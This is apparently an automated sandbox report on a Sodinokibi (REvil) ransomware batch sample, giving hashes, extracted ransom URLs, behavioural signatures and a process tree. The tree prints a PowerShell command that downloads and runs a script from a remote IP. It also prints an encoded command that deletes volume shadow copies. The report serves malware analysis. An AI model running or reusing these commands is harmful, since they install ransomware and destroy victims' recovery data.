Analysis
- max time kernel: 137s
- max time network: 53s
- platform: windows7_x64
- resource: win7v200430
- submitted: 08-06-2020 00:10
Tasks
- Static task: static1
- Behavioral task: behavioral1
  Sample: 30c96bd5d55b4ede2ca100b6224868a5.bat
  Resource: win7v200430
- Behavioral task: behavioral2
  Sample: 30c96bd5d55b4ede2ca100b6224868a5.bat
  Resource: win10v200430
General
- Target: 30c96bd5d55b4ede2ca100b6224868a5.bat
- Size: 213B
- MD5: 5ae8dd965aa55e41ed206290cfbb9a9c
- SHA1: 6d948a52ac79ff84600ee780122920ddd586ca62
- SHA256: 2f7e36eabad58aa80b8ad798095771fcbd5670e8d4684ae942666ce2a086bb24
- SHA512: 0dde15a4d13e9cbb065df025ede606e37de6f6be2fa55495891694f564a4b776884fa1eaa2b7d44cbdac9d79cb24d1d5f16ffc8d347fc3626de2959515420629
Malware Config
- Extracted: http://185.103.242.78/pastes/30c96bd5d55b4ede2ca100b6224868a5
- Extracted: C:\3b8h58-readme.txt
  Family: sodinokibi
  URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D04A4DF1C363A8E8
  - http://decryptor.cc/D04A4DF1C363A8E8
Signatures
- Blacklisted process makes network request (1 IoC)
  Processes: flow 3, PID 1480, powershell.exe
- Enumerates connected drives (3 TTPs)
-
- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sc2fifaa88c0o.bmp" (powershell.exe)
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
-
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  - PID 1400 (cmd.exe) wrote to memory of PID 1480 (powershell.exe)
  - PID 1480 (powershell.exe) wrote to memory of PID 1352 (powershell.exe), 4 entries
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 1480, powershell.exe
  - Token: SeDebugPrivilege, PID 1480, powershell.exe
  - Token: SeDebugPrivilege, PID 1352, powershell.exe
  - Token: SeBackupPrivilege, PID 792, vssvc.exe
  - Token: SeRestorePrivilege, PID 792, vssvc.exe
  - Token: SeAuditPrivilege, PID 792, vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 1480, powershell.exe
- Drops file in Program Files directory (36 IoCs)
  Processes: powershell.exe
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\3b8h58-readme.txt
  - File opened for modification: \??\c:\program files\ApproveEnter.vst
  - File opened for modification: \??\c:\program files\LimitUpdate.wav
  - File opened for modification: \??\c:\program files\StepMerge.mp4
  - File opened for modification: \??\c:\program files\SubmitRead.jtx
  - File opened for modification: \??\c:\program files\SaveDisconnect.avi
  - File opened for modification: \??\c:\program files\SplitPublish.docm
  - File opened for modification: \??\c:\program files\WatchSend.vstm
  - File opened for modification: \??\c:\program files\RedoPing.mp4
  - File opened for modification: \??\c:\program files\UnregisterReceive.mpg
  - File opened for modification: \??\c:\program files\MeasureLock.TTS
  - File opened for modification: \??\c:\program files\NewHide.ini
  - File opened for modification: \??\c:\program files\SearchLock.jpg
  - File opened for modification: \??\c:\program files\DisableFind.MTS
  - File opened for modification: \??\c:\program files\ExpandSwitch.xlsm
  - File opened for modification: \??\c:\program files\JoinConvertFrom.mp3
  - File opened for modification: \??\c:\program files\OutCheckpoint.xltm
  - File opened for modification: \??\c:\program files\RedoRestore.ini
  - File opened for modification: \??\c:\program files\SaveProtect.xlsm
  - File opened for modification: \??\c:\program files\SyncResize.emf
  - File opened for modification: \??\c:\program files\UninstallExpand.mp2v
  - File opened for modification: \??\c:\program files\BackupLimit.rtf
  - File opened for modification: \??\c:\program files\DismountOptimize.7z
  - File created: \??\c:\program files\3b8h58-readme.txt
  - File opened for modification: \??\c:\program files\UnpublishRepair.xls
  - File opened for modification: \??\c:\program files\CompareAssert.potm
  - File opened for modification: \??\c:\program files\MeasureTrace.js
  - File opened for modification: \??\c:\program files\MeasureInitialize.3gp
  - File created: \??\c:\program files\microsoft sql server compact edition\3b8h58-readme.txt
  - File opened for modification: \??\c:\program files\SuspendConvertFrom.xla
  - File opened for modification: \??\c:\program files\TraceCheckpoint.vsx
  - File opened for modification: \??\c:\program files\UndoAssert.ex_
  - File opened for modification: \??\c:\program files\UninstallEnable.3g2
  - File created: \??\c:\program files (x86)\3b8h58-readme.txt
  - File opened for modification: \??\c:\program files\AddResize.M2V
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\3b8h58-readme.txt
  (all entries by powershell.exe)
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: PID 1480, powershell.exe
- Suspicious behavior: EnumeratesProcesses (77 IoCs)
  Processes: powershell.exe (PID 1480) and powershell.exe (PID 1352); the 77 entries are repeated hits for these two PIDs, the large majority for PID 1480
Processes
- C:\Windows\system32\cmd.exe (PID 1400, level 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\30c96bd5d55b4ede2ca100b6224868a5.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1480, level 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/30c96bd5d55b4ede2ca100b6224868a5');Invoke-BEQEFP;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1352, level 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of volume shadow copies, which is why vssvc.exe is spawned below)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\vssvc.exe (PID 792, level 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken